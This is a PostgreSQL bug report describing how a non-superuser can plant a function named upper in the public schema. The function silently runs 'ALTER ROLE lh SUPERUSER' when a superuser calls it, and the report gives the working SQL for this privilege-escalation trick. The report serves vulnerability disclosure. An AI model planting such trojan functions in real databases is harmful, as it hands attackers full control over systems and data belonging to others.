The following bug has been logged on the website:
Bug reference: 16448
Logged by: yi Ding
Email address: abcxiaod@126.com
PostgreSQL version: 10.12
Operating system: linux
Description:
A common user created a function in the public space and added some
malicious codes in the function, when other users with superuser rights call
this function, the malicious code will be executed , so as to achieve the
purpose of remote malicious code execution.
First, Non-superuser lh defines a function named upper, which contains
the statement to modify user permissions.
SQL:
CREATE TABLE public.testlh AS SELECT ‘lh’::varchar AS contents;
CREATE FUNCTION public.upper(varchar) RETURNS TEXT AS $$
ALTER ROLE lh SUPERUSER;
SELECT pg_catalog.upper($1);
$$ LANGUAGE SQL VOLATILE;
Second, Superuser pg01 will execute the above statement after calling the
upper function, whice will change user lh to a super user.